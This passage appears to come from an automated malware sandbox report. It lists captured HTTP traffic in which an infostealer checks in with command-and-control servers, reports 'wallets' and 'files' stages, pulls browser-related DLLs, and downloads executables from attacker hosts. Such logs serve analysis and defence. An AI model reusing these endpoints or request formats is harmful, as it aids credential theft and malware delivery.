name="message"plugins------KJECFHCBKKEBAKFIJDHI--
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFHJDAEHIEHJJKFBGDAHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 44 41 45 48 49 45 48 4a 4a 4b 46 42 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 63 64 61 66 31 34 30 64 35 36 61 62 39 34 34 63 36 38 31 36 64 61 36 62 64 33 37 66 33 38 36 64 30 62 39 62 38 32 66 37 36 31 36 30 34 34 64 39 36 63 61 31 35 33 36 35 34 30 36 65 34 63 36 35 31 61 61 33 64 34 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 44 41 45 48 49 45 48 4a 4a 4b 46 42 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 44 41 45 48 49 45 48 4a 4a 4b 46 42 47 44 41 2d 2d 0d 0a Data Ascii: ------KKFHJDAEHIEHJJKFBGDAContent-Disposition: form-data; name="token"dcdaf140d56ab944c6816da6bd37f386d0b9b82f7616044d96ca15365406e4c651aa3d47------KKFHJDAEHIEHJJKFBGDAContent-Disposition: form-data; name="message"fplugins------KKFHJDAEHIEHJJKFBGDA--
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 34 34 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014443001&unit=246122658369
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJDGHCBGDHIECBGIDAEHost: 185.215.113.206Content-Length: 6907Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 31.41.244.11
                      Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 31.41.244.11
                      Source: global trafficHTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 31.41.244.11If-Modified-Since: Wed, 11 Dec 2024 08:22:24 GMTIf-None-Match: "67594bc0-b1a00"
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 31 34 34 34 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1014444001&unit=246122658369
                      Source: global trafficHTTP traffic detected: GET /files/encoxx/random.exe HTTP/1.1Host: 31.41.244.11
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJEBFCFIJJJEBGDBAKEHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 63 64 61 66 31 34 30 64 35 36 61 62 39 34 34 63 36 38 31 36 64 61 36 62 64 33 37 66 33 38 36 64 30 62 39 62 38 32 66 37 36 31 36 30 34 34 64 39 36 63 61 31 35 33 36 35 34 30 36 65 34 63 36 35 31 61 61 33 64 34 37 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 2d 2d 0d 0a Data Ascii: ------IIJEBFCFIJJJEBGDBAKEContent-Disposition: form-data; name="token"dcdaf140d56ab944c6816da6bd37f386d0b9b82f7616044d96ca15365406e4c651aa3d47------IIJEBFCFIJJJEBGDBAKEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IIJEBFCFIJJJEBGDBAKEContent-Disposition: form-data; name="file"------IIJEBFCFIJJJEBGDBAKE--
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 34 34 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014445001&unit=246122658369
                      Source: global trafficHTTP traffic detected: GET /files/hell911/random.exe HTTP/1.1Host: 31.41.244.11
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 34 34 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014446001&unit=246122658369
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBKEHJJDAAAAKECBGHDHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 63 64 61 66 31 34 30 64 35 36 61 62 39 34 34 63 36 38 31 36 64 61 36 62 64 33 37 66 33 38 36 64 30 62 39 62 38 32 66 37 36 31 36 30 34 34 64 39 36 63 61 31 35 33 36 35 34 30 36 65 34 63 36 35 31 61 61 33 64 34 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 2d 2d 0d 0a Data Ascii: ------JEBKEHJJDAAAAKECBGHDContent-Disposition: form-data; name="token"dcdaf140d56ab944c6816da6bd37f386d0b9b82f7616044d96ca15365406e4c651aa3d47------JEBKEHJJDAAAAKECBGHDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JEBKEHJJDAAAAKECBGHDContent-Disposition: form-data; name="file"------JEBKEHJJDAAAAKECBGHD--
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
                      Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAECFIJDAAAKECBFCGHIHost: 185.215.113.206Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDBGDHIIDAEBFHJJDBFIHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 63 64 61 66 31 34 30 64 35 36 61 62 39 34 34 63 36 38 31 36 64 61 36 62 64 33 37 66 33 38 36 64 30 62 39 62 38 32 66 37 36 31 36 30 34 34 64 39 36 63 61 31 35 33 36 35 34 30 36 65 34 63 36 35 31 61 61 33 64 34 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 49 2d 2d 0d 0a Data Ascii: ------JDBGDHIIDAEBFHJJDBFIContent-Disposition: form-data; name="token"dcdaf140d56ab944c6816da6bd37f386d0b9b82f7616044d96ca15365406e4c651aa3d47------JDBGDHIIDAEBFHJJDBFIContent-Disposition: form-data; name="message"wallets------JDBGDHIIDAEBFHJJDBFI--
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIJEHJDHJKECBFHDHDHHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 49 4a 45 48 4a 44 48 4a 4b 45 43 42 46 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 63 64 61 66 31 34 30 64 35 36 61 62 39 34 34 63 36 38 31 36 64 61 36 62 64 33 37 66 33 38 36 64 30 62 39 62 38 32 66 37 36 31 36 30 34 34 64 39 36 63 61 31 35 33 36 35 34 30 36 65 34 63 36 35 31 61 61 33 64 34 37 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 45 48 4a 44 48 4a 4b 45 43 42 46 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 45 48 4a 44 48 4a 4b 45 43 42 46 48 44 48 44 48 2d 2d 0d 0a Data Ascii: ------DHIJEHJDHJKECBFHDHDHContent-Disposition: form-data; name="token"dcdaf140d56ab944c6816da6bd37f386d0b9b82f7616044d96ca15365406e4c651aa3d47------DHIJEHJDHJKECBFHDHDHContent-Disposition: form-data; name="message"files------DHIJEHJDHJKECBFHDHDH--
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKKKFCFIIJJKKFHIEHJKHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 46 43 46 49 49 4a 4a 4b 4b 46 48 49 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 44 42 33 41 36 39 44 41 41 36 45 32 33 37 31 35 34 33 35 31 30 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 46 43 46 49 49 4a 4a 4b 4b 46 48 49 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 46 43 46 49 49 4a 4a 4b 4b 46 48 49 45 48 4a 4b 2d 2d 0d 0a Data Ascii: ------BKKKFCFIIJJKKFHIEHJKContent-Disposition: form-data; name="hwid"2DB3A69DAA6E2371543510------BKKKFCFIIJJKKFHIEHJKContent-Disposition: form-data; name="build"stok------BKKKFCFIIJJKKFHIEHJK--
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGIJJDGCBKFIDHIEBKEHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 44 42 33 41 36 39 44 41 41 36 45 32 33 37 31 35 34 33 35 31 30 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 2d 2d 0d 0a Data Ascii: ------HDGIJJDGCBKFIDHIEBKEContent-Disposition: form-data; name="hwid"2DB3A69DAA6E2371543510------HDGIJJDGCBKFIDHIEBKEContent-Disposition: form-data; name="build"stok------HDGIJJDGCBKFIDHIEBKE--
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
